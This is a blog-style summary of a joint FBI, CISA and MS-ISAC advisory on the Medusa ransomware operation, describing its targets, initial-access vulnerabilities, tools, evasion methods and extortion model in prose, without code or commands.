Post

Medusa Ransomware Strikes Over 300 Critical Infrastructure Organizations by February 2025

Medusa Ransomware Strikes Over 300 Critical Infrastructure Organizations by February 2025

TL;DR

The Medusa ransomware operation has targeted over 300 critical infrastructure organizations in the United States by February 2025. The FBI, CISA, and MS-ISAC issued a joint advisory detailing the tactics, techniques, and indicators of compromise (IOCs) used by Medusa. This ransomware-as-a-service (RaaS) variant employs sophisticated methods, including phishing, exploiting software vulnerabilities, and using legitimate tools for reconnaissance and lateral movement.

Main Content

Medusa Ransomware Targets Critical Infrastructure

The Medusa ransomware operation has impacted over 300 organizations in critical infrastructure sectors in the United States by February 2025. A joint advisory issued by the FBI, CISA, and MS-ISAC details the tactics, techniques, and indicators of compromise (IOCs) based on recent FBI investigations [1].

Overview of Medusa Ransomware

Medusa, a ransomware-as-a-service (RaaS) variant first identified in June 2021, has affected various critical infrastructure sectors, including medical, education, legal, insurance, technology, and manufacturing. The advisory emphasizes that Medusa is distinct from MedusaLocker and Medusa mobile malware variants [2].

Tactics and Techniques

Initial Access and Exploitation

Medusa developers recruit initial access brokers (IABs) through cybercriminal forums, offering payments ranging from $100 to $1 million. The group’s affiliates gain access to victims using phishing campaigns to steal credentials and exploiting unpatched software vulnerabilities. Notably, they target:

  • CVE-2024-1709: ScreenConnect authentication bypass [3].
  • CVE-2023-48788: Fortinet EMS SQL injection [4].

Reconnaissance and Lateral Movement

Medusa operators leverage living off the land (LOTL) techniques and legitimate tools like Advanced IP Scanner and SoftPerfect Network Scanner for reconnaissance. They scan ports such as FTP, SSH, HTTP, SQL databases, and RDP after gaining a foothold. Network and filesystem enumeration are conducted using PowerShell and Windows Command Prompt. Additionally, operators utilize Windows Management Instrumentation (WMI) to query system information.

Evasion and Data Exfiltration

Medusa actors use LOTL techniques to evade detection, employing certutil.exe for stealthy file ingress. They delete PowerShell command history to cover their tracks and use increasingly complex PowerShell evasion tactics, including base64-encoded commands, obfuscation, and memory-based execution. The operators also attempt to disable security tools by exploiting vulnerable or signed drivers. The ransomware relies on Ligolo for reverse tunneling and Cloudflared to expose systems securely without direct internet exposure.

Encryption and Extortion

Medusa operators leverage legitimate remote access tools like AnyDesk, Atera, and Splashtop, alongside RDP and PsExec, to move laterally and locate files for exfiltration and encryption. They use PsExec to execute scripts, enable RDP access, and modify firewall rules. Attackers use Mimikatz to steal credentials and Rclone for data exfiltration. Encryption is executed using gaze.exe, which disables security tools, deletes backups, and encrypts files with AES-256 before dropping a ransom note [5].

Double Extortion Model

Medusa RaaS employs a double extortion model, where victims must pay to decrypt files and prevent further release. The ransom note demands victims make contact within 48 hours via a Tor browser-based live chat or Tox, an end-to-end encrypted instant-messaging platform. If the victim does not respond, Medusa actors reach out directly by phone or email. Medusa operates a .onion data leak site, divulging victims alongside countdowns to the release of information. Ransom demands are posted on the site, with direct hyperlinks to Medusa-affiliated cryptocurrency wallets. Victims can pay $10,000 USD in cryptocurrency to add a day to the countdown timer.

Potential Triple Extortion Scheme

FBI investigations revealed that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid and requested half of the payment be made again to provide the “true decryptor”— potentially indicating a triple extortion scheme [6].

Conclusion

The Medusa ransomware operation highlights the evolving threat landscape targeting critical infrastructure. Organizations must remain vigilant and implement robust cybersecurity measures to protect against such sophisticated attacks.

Additional Resources

For further insights, check:

References

[1]: FBI, CISA, and MS-ISAC (2025). “Joint Advisory on Medusa Ransomware”. Retrieved 2025-03-13. [2]: Security Affairs (2025). “Medusa Ransomware Details”. Retrieved 2025-03-13. [3]: Security Affairs (2025). “CVE-2024-1709”. Retrieved 2025-03-13. [4]: Security Affairs (2025). “CVE-2023-48788”. Retrieved 2025-03-13. [5]: MITRE ATT&CK (2025). “T1657”. Retrieved 2025-03-13. [6]: Security Affairs (2025). “Medusa Ransomware Extortion”. Retrieved 2025-03-13.

This post is licensed under CC BY 4.0 by the author.